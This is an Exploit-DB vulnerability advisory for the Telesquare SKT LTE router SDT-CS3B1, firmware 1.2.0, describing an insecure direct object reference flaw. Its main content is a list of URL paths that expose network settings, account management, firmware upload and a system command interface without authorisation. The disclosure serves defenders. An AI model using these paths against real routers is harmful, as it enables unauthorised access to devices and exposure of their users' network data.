Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure

EDB-ID:

43402

CVE:

N/A

EDB Verified:

Author:

LiquidWorm

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2017-12-27

Vulnerable App: 
Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak


Vendor: Telesquare Co., Ltd.
Product web page: http://www.telesquare.co.kr
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
                  LteVer: ML300S5XEA41_090  1 0.1.0
                  Modem model: PM-L300S

Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
LTE wireless communication based LTE router product.

Desc: Insecure direct object references occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system.

Tested on: lighttpd/1.4.20
Linux mips


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5445
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php


22.12.2017

--



/home.html                                  <<  Version and status info leak (firmware, device, type, modem, lte)
/index.html                                 <<  Version and status info leak (firmware, device, type, modem, lte)
/nas/smbsrv.shtml                           <<  Samba server settings (workgroup, netbios name)
/nas/ftpsrv.shtml                           <<  FTP settings
/wifi2g/basic.shtml                         <<  Wireless settings
/admin/status.shtml                         <<  Access point status info leak
/internet/wan.shtml                         <<  WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns)
/internet/lan.shtml                         <<  LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns)
/admin/statistic.shtml                      <<  System statistics info leak
/admin/management.shtml                     <<  System management (account settings, ntp settings, ddns settings)
/serial/serial_direct.shtml                 <<  Direct serial settings (network connection settings, serverip, port)
/admin/system_command.shtml                 <<  System command interface
/internet/dhcpcliinfo.shtml                 <<  DHCP Clients info leak (hostname, macaddr, ipaddr)
/admin/upload_firmware.shtml                <<  Router firmware and lte firmware upgrade
/firewall/vpn_futuresystem.shtml            <<  VPN settings (udp packet transfer, icmp check)
/cgi-bin/lte.cgi?Command=getUiccState       <<  GetUiccState()
/cgi-bin/lte.cgi?Command=getModemStatus     <<  Modem status info leak
/cgi-bin/systemutil.cgi?Command=SystemInfo  <<  System info leak
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services